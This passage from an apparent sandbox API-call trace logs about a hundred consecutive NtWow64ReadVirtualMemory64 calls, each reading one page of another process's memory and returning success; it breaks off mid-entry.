[0135.465] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b08000, Buffer=0x7ffb, BufferSize=0xa98000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.465] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b09000, Buffer=0x7ffb, BufferSize=0xa99000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.466] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0a000, Buffer=0x7ffb, BufferSize=0xa9a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.524] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0b000, Buffer=0x7ffb, BufferSize=0xa9b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.524] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0c000, Buffer=0x7ffb, BufferSize=0xa9c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.524] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0d000, Buffer=0x7ffb, BufferSize=0xa9d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.524] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0e000, Buffer=0x7ffb, BufferSize=0xa9e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.525] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0f000, Buffer=0x7ffb, BufferSize=0xa9f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.525] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b10000, Buffer=0x7ffb, BufferSize=0xaa0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.525] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b11000, Buffer=0x7ffb, BufferSize=0xaa1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.525] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b12000, Buffer=0x7ffb, BufferSize=0xaa2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.526] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b13000, Buffer=0x7ffb, BufferSize=0xaa3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.526] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b14000, Buffer=0x7ffb, BufferSize=0xaa4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.526] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b15000, Buffer=0x7ffb, BufferSize=0xaa5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.526] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b16000, Buffer=0x7ffb, BufferSize=0xaa6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.527] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b17000, Buffer=0x7ffb, BufferSize=0xaa7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.527] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b18000, Buffer=0x7ffb, BufferSize=0xaa8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.527] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b19000, Buffer=0x7ffb, BufferSize=0xaa9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.527] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1a000, Buffer=0x7ffb, BufferSize=0xaaa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.527] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1b000, Buffer=0x7ffb, BufferSize=0xaab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.528] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1c000, Buffer=0x7ffb, BufferSize=0xaac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.528] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1d000, Buffer=0x7ffb, BufferSize=0xaad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.528] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1e000, Buffer=0x7ffb, BufferSize=0xaae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.528] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1f000, Buffer=0x7ffb, BufferSize=0xaaf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.528] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b20000, Buffer=0x7ffb, BufferSize=0xab0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.529] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b21000, Buffer=0x7ffb, BufferSize=0xab1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.529] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b22000, Buffer=0x7ffb, BufferSize=0xab2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.529] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b23000, Buffer=0x7ffb, BufferSize=0xab3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.529] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b24000, Buffer=0x7ffb, BufferSize=0xab4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.530] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b25000, Buffer=0x7ffb, BufferSize=0xab5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.530] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b26000, Buffer=0x7ffb, BufferSize=0xab6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.530] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b27000, Buffer=0x7ffb, BufferSize=0xab7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.530] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b28000, Buffer=0x7ffb, BufferSize=0xab8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.530] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b29000, Buffer=0x7ffb, BufferSize=0xab9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.531] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2a000, Buffer=0x7ffb, BufferSize=0xaba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.531] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2b000, Buffer=0x7ffb, BufferSize=0xabb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.531] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2c000, Buffer=0x7ffb, BufferSize=0xabc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.531] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2d000, Buffer=0x7ffb, BufferSize=0xabd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.531] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2e000, Buffer=0x7ffb, BufferSize=0xabe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.532] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2f000, Buffer=0x7ffb, BufferSize=0xabf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.532] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b30000, Buffer=0x7ffb, BufferSize=0xac0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.532] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b31000, Buffer=0x7ffb, BufferSize=0xac1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.532] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b32000, Buffer=0x7ffb, BufferSize=0xac2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.533] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b33000, Buffer=0x7ffb, BufferSize=0xac3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.533] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b34000, Buffer=0x7ffb, BufferSize=0xac4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.533] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b35000, Buffer=0x7ffb, BufferSize=0xac5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.533] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b36000, Buffer=0x7ffb, BufferSize=0xac6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.534] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b37000, Buffer=0x7ffb, BufferSize=0xac7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.534] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b38000, Buffer=0x7ffb, BufferSize=0xac8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.534] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b39000, Buffer=0x7ffb, BufferSize=0xac9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.535] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3a000, Buffer=0x7ffb, BufferSize=0xaca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.535] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3b000, Buffer=0x7ffb, BufferSize=0xacb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.535] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3c000, Buffer=0x7ffb, BufferSize=0xacc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.535] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3d000, Buffer=0x7ffb, BufferSize=0xacd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.536] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3e000, Buffer=0x7ffb, BufferSize=0xace000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.536] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3f000, Buffer=0x7ffb, BufferSize=0xacf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.537] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b40000, Buffer=0x7ffb, BufferSize=0xad0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.537] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b41000, Buffer=0x7ffb, BufferSize=0xad1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.537] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b42000, Buffer=0x7ffb, BufferSize=0xad2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.537] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b43000, Buffer=0x7ffb, BufferSize=0xad3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.537] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b44000, Buffer=0x7ffb, BufferSize=0xad4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.538] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b45000, Buffer=0x7ffb, BufferSize=0xad5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.538] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b46000, Buffer=0x7ffb, BufferSize=0xad6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.538] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b47000, Buffer=0x7ffb, BufferSize=0xad7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.538] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b48000, Buffer=0x7ffb, BufferSize=0xad8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.538] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b49000, Buffer=0x7ffb, BufferSize=0xad9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.539] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4a000, Buffer=0x7ffb, BufferSize=0xada000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.539] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4b000, Buffer=0x7ffb, BufferSize=0xadb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.539] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4c000, Buffer=0x7ffb, BufferSize=0xadc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.539] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4d000, Buffer=0x7ffb, BufferSize=0xadd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.540] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4e000, Buffer=0x7ffb, BufferSize=0xade000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.540] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4f000, Buffer=0x7ffb, BufferSize=0xadf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.540] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b50000, Buffer=0x7ffb, BufferSize=0xae0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.540] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b51000, Buffer=0x7ffb, BufferSize=0xae1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.540] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b52000, Buffer=0x7ffb, BufferSize=0xae2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.541] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b53000, Buffer=0x7ffb, BufferSize=0xae3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.541] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b54000, Buffer=0x7ffb, BufferSize=0xae4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.541] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b55000, Buffer=0x7ffb, BufferSize=0xae5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.541] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b56000, Buffer=0x7ffb, BufferSize=0xae6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.541] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b57000, Buffer=0x7ffb, BufferSize=0xae7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.542] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b58000, Buffer=0x7ffb, BufferSize=0xae8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.542] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b59000, Buffer=0x7ffb, BufferSize=0xae9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.542] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5a000, Buffer=0x7ffb, BufferSize=0xaea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.543] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5b000, Buffer=0x7ffb, BufferSize=0xaeb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.543] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5c000, Buffer=0x7ffb, BufferSize=0xaec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.543] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5d000, Buffer=0x7ffb, BufferSize=0xaed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.543] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5e000, Buffer=0x7ffb, BufferSize=0xaee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.544] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5f000, Buffer=0x7ffb, BufferSize=0xaef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.544] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b60000, Buffer=0x7ffb, BufferSize=0xaf0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.544] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b61000, Buffer=0x7ffb, BufferSize=0xaf1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.544] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b62000, Buffer=0x7ffb, BufferSize=0xaf2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.545] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b63000, Buffer=0x7ffb, BufferSize=0xaf3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.545] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b64000, Buffer=0x7ffb, BufferSize=0xaf4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.545] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b65000, Buffer=0x7ffb, BufferSize=0xaf5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.545] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b66000, Buffer=0x7ffb, BufferSize=0xaf6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.545] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b67000, Buffer=0x7ffb, BufferSize=0xaf7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.545] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b68000, Buffer=0x7ffb, BufferSize=0xaf8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.546] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b69000, Buffer=0x7ffb, BufferSize=0xaf9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.546] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6a000, Buffer=0x7ffb, BufferSize=0xafa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.546] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6b000, Buffer=0x7ffb, BufferSize=0xafb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.546] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6c000, Buffer=0x7ffb, BufferSize=0xafc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.546] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6d000, Buffer=0x7ffb, BufferSize=0xafd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.546] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6e000, Buffer=0x7ffb, BufferSize=0xafe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.547] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6f000, Buffer=0x7ffb, BufferSize=0xaff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.547] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b70000, Buffer=0x7ffb, BufferSize=0xb00000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.547] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b71000, Buffer=0x7ffb, BufferSize=0xb01000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.547] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b72000, Buffer=0x7ffb, BufferSize=0xb02000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.547] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b73000, Buffer=0x7ffb, BufferSize=0xb03000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.548] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b74000, Buffer=0x7ffb, BufferSize=0xb04000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.548] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b75000, Buffer=0x7ffb, BufferSize=0xb05000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.548] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b76000, Buffer=0x7ffb, BufferSize=0xb06000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.549] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b77000, Buffer=0x7ffb, BufferSize=0xb07000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.549] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b78000, Buffer=0x7ffb, BufferSize=0xb08000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.549] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b79000, Buffer=0x7ffb, BufferSize=0xb09000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 